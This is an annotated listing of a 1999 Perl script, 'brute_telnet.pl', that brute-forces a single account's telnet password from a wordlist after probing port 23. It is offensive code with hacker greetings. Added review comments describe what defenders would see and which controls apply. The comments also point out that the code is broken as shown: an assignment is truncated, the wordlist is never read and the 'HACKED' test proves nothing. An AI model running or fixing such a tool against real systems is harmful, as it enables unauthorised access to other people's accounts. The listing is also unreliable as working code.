#!/usr/bin/perl
# brute_telnet.pl - brute force login through telnet using treated wordlists
# by obecian
# 8/23/99
# NEW!! - Select # of seconds in telnet login timeout, fine tune your hack!
#         Select # of attempts
# Greetz to:
#   bind [BSD ownz j00!]
#   cripto [they can't catch me... i'm the gingerbread man!]
#   GhettoHackers [40 oz to phear]
#
# NOTE(review): summary for readers analysing this listing.
#   - Flow: parse options, open the wordlist, make one bare TCP connect to
#     port 23 to see whether anything is listening, then loop submitting
#     telnet logins for a single user name with successive wordlist entries.
#   - What a defender would see: a short connection to port 23 that sends no
#     data, followed by a run of failed telnet logins for one account from one
#     source. Failed-login logging, per-account lockout or back-off, and
#     retiring telnet in favour of an encrypted protocol are the controls
#     that apply.
#   - The listing has no "use strict" / "use warnings", and several variables
#     below are undeclared or unused; it does not compile as shown (see the
#     @namespace assignment).

use Socket;
use Net::Telnet;

# network timeouts (seconds) for the initial port-23 probe; both are passed
# to alarm() below
my $MAX_SOCKET_TIME = 2;
my $MAX_CONNECT_TIME = 3;

# usage info
# NOTE(review): the text names the script "bruteforce.pl" while the header
# calls it brute_telnet.pl.
my $HELP = qq(brute_telnet.pl - obecian \(c\)1998-99\nUsage: bruteforce.pl [-h | --help] [-d | --debug] [-t | --timeout seconds] [-a | --attempts num] user hostname wordlist\n);

# NOTE(review): $victim is declared here but never assigned anywhere in the
# listing; the target is held in the undeclared global $hostname instead.
my ($user,$victim,$wordlist);
my $timeout = 10;    # Net::Telnet Timeout value, overridable with -t / --timeout
my $attempts = 3;    # guesses per Net::Telnet object, overridable with -a / --attempts
my $DEBUG = 0;

# Command-line parsing: consume @ARGV one element at a time.
while($_=shift){
    if(/^--(.*)/) {
        # Long options. The patterns are unanchored, so any long option that
        # merely contains "help", "debug", "timeout" or "attempts" matches.
        $_=$1;
        if(/help/) { print $HELP; exit(0); }
        if(/debug/) { $DEBUG=1; }
        if(/timeout/) { $timeout=shift; }
        if(/attempts/) { $attempts=shift; }
    } elsif(/^-(.*)/) {
        # Short options, matched on the first character after the dash.
        $_=$1;
        if(/^h/ or /^\?/) { print $HELP; exit(0); }
        if(/^d/){ $DEBUG=1; }
        if(/^t/){ $timeout=shift; }
        if(/^a/){ $attempts=shift; }
    } else {
        # First non-option argument starts the positional triple:
        # user, hostname, wordlist.
        $user = $_;
        $hostname = shift;
        $wordlist = shift;
    }
}

# NOTE(review): $wordlist is tested twice and $hostname is never tested, so a
# missing hostname is not caught here.
if ($user eq "" || $wordlist eq "" || $wordlist eq "") { print $HELP; exit(0); }

# open dictionary for reading
# NOTE(review): two-argument open with an interpolated command-line value and
# a bareword handle; the file name can influence the open mode. The
# three-argument form with a lexical handle avoids that.
open(DICT, "< $wordlist") or die "Error: $!";

# --- Reachability probe: plain TCP connect to port 23 ---
my($proto,$port,$sin,$ip);
print "Trying $hostname\n" if($DEBUG);
# Any alarm during the probe ends the script silently with exit status 0.
local $SIG{'ALRM'} = sub { exit(0); };
alarm $MAX_SOCKET_TIME;          # bounds the lookups that follow
$proto = getprotobyname('tcp');
$port = 23;
$ip = inet_aton($hostname);
if (!$ip) { print "Could not find host\n" if($DEBUG); exit(0); }
$sin = sockaddr_in($port, $ip);
# NOTE(review): the return value of socket() is not checked.
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
alarm $MAX_CONNECT_TIME;         # re-arms the alarm to bound connect()
if(!connect(SOCK, $sin)) { exit(0); }
# Keep the peer's packed address for the reverse lookup below, then drop the
# probe connection without sending any data.
my $iaddr = (unpack_sockaddr_in(getpeername(SOCK)))[1];
close(SOCK);

# something is listening on port 23
# NOTE(review): $victim is never set, so this debug line prints no host name.
print "listen $victim\n" if($DEBUG);
alarm 0;                         # cancel the pending alarm
# Replaces the user-supplied name with the reverse-DNS name of the peer.
# NOTE(review): if the address has no reverse record this presumably leaves
# $hostname undefined - confirm.
$hostname = gethostbyaddr($iaddr,AF_INET);

my $guess;
my $ptr=0;     # index of the next wordlist entry in @namespace
# NOTE(review): the right-hand side of this assignment is missing from the
# listing (probably lost when the page was extracted), so the script is a
# syntax error as shown. The DICT handle opened above is not read anywhere
# in the visible code.
my @namespace = ;

#while ($guess = ) {
while (1) {
    # create new telnet connection object; Timeout comes from $timeout
    # (10 seconds unless overridden on the command line)
    # Errmode is a sub that just returns, so Net::Telnet errors (timeouts,
    # failed logins) are swallowed instead of being raised or printed.
    $t = new Net::Telnet (Timeout => $timeout, Prompt => '/[\$%#>)] /', Errmode => sub { return; });
    if (!$t) { print "ACCESS DENIED!\n"; exit(0); }
    # Up to $attempts guesses are made with this object before a new one is
    # created by the outer loop.
    for ($i=0; $i<$attempts; $i++) {
        $guess = $namespace[$ptr];
        $ptr++;
        # chop removes the last character whatever it is (presumably the
        # trailing newline of a wordlist line).
        chop $guess;
        # An empty entry, or running past the end of @namespace, ends the run.
        if ($guess eq "") { print "Wordlist exhausted... try another\n\n"; exit(0); }
        print "$user\@$hostname: $guess\n";
        # NOTE(review): open() is called for every guess, so each attempt
        # presumably shows up as a separate TCP connection - confirm against
        # Net::Telnet.
        $t->open($hostname);
        $t->login(Name => $user, Password => $guess);
        my (@data) = $t->get();
        # NOTE(review): NULL is a bareword here (no "use strict"), which is 0
        # in numeric context, so this only tests whether get() returned
        # anything. It does not confirm that the login succeeded; the
        # "HACKED" line is not reliable evidence of a compromise.
        if (@data != NULL) { print "HACKED\n\n"; print "End of Line.\n"; exit(0); }
    }
}